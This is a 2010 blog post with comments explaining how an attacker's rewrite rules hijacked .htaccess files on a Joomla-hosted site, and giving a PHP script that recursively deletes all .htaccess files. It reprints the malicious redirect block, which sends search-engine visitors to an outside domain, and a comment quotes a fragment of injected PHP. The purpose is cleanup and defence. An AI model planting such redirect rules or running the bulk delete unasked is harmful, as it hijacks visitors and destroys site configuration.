Tuesday, September 21, 2010

htaccess file hacked (hijacked) - How to cleanup

Issues
I have multiple websites working properly before I want sleep. But next morning suddenly all site encounter 500 - internal error and became unavailable. After investigation, I found all .htaccess files of my websites are modified by Hacker. The Hacker seems to redirect visitors from search engine to some other destination. Based on the report from my ISP, the hacker was entered via Joomla. If you are using Joomla, I suggest to upgrade it to latest version.

Example of hijacked .htaccess file



# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]

...

RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://iamprotectedfrom.net/cgi-bin/r.cgi?p=10003&i=e0550346&j=308&m=1de1da928819b3ad82f33326bb185c45&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo



What you can see
1. If you have existing .htaccess file, new lines as above will be added.
If you don't have existing .htaccess file, a new .htaccess file was created.
2. This happened in all folders and sub-folders


In order to make my sites working properly, I had to restore all existing .htaccess files and remove un-necessary .htaccess files from all folders including image folders, script folders.

Here are problems I faced:
Problems:
1. Too many folders and sub-folders, it is almost impossible to do it manually.
2. You can only access via HTTP or FTP to your server, no server side command available.

I contacted my ISP (internet service provider), I was told that it is not their responsibility. Then I searched on the internet, didn't found any useful information on how to cleanup. so I decided to cleanup by myself. I created a PHP script to remove all hijacked htaccess files.

STEPS to clean up
1. Backup the original contents part of my .htaccess file to other files if you have
2. Run the script below to remove all .htaccess file from all folders recursively.
3. CREATE NEW .htaccess file and copy/paste back content from you backup file if applicable.


RemoveHTACCESS.php

<?php

function searchDir($dir) {
$dhandle = opendir($dir);
if ($dhandle) {
// loop through it
while (false !== ($fname = readdir($dhandle))) {
// if the element is a directory, and
// does not start with a '.' or '..'
// we call searchDir function recursively
// passing this element as a parameter
if (is_dir( "{$dir}/{$fname}" )) {
if (($fname != '.') && ($fname != '..')) {
echo "<u>Searching Files in the Directory</u>: {$dir}/{$fname} <br />";
searchDir("$dir/$fname");
}
// the element if it is a .htaccess file, we delete it
} else {
if($fname == ".htaccess")
{
echo "File: {$dir}/{$fname} <br />";
unlink("{$dir}/{$fname}");
}
}
}
closedir($dhandle);
}
}

searchDir(".");


?>


Note:
The script above will removed all .htaccess files in the folder and all its sub-folders. Please do it very carefully. You can try on a no unimportant folder first. Even I have tested many times, also used it for a few times to do the cleanup. But please take you own responsibility.

8 comments:

Suze said...

Thanks for your post, it has been very useful to fix my websites that have been hacked for a third time, and the ISP does not give any solution.
Any advice to avoid another hacking?

Alvin said...

I'm glad to hear that it's useful.

To prevent hackers, please change your FTP and site admin password frequently. Especially when you detected an attack.

If you have copied .htaccess files to your local PC, high possibility that it is also affected, I suggest your check and remove it.

Anonymous said...

How did the .htaccess file get into every folder beneath the webroot (and sometimes above it as well) ?
FTP has not been enabled at all.

Alvin said...

Hacker created the .htaccess file and placed it at every folder of site to redirect your visitors to other site.

Even FTP has been disabled, it maybe came in from other source, like your control panel file manager.

Also it could be any other source.

Anonymous said...

You need to look through your php files. I encountered this same issue a few weeks back. Did a search and found it was a Joomla issue. I wasn't nor have I ever ran Joomla. Check your php code for code like this:

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;

$olderrxxx=error_reporting(0);

function outputxxx_callback($str)

Take out the everything from
after that you should see your code. This took me several days to clean up and I am still finding pieces here and there.

Bhargava said...

worked like a charm

thanks !! :)

Anonymous said...

this work

very thanks friend!

Anonymous said...

Cool script! Thanks, saved loads of hassle!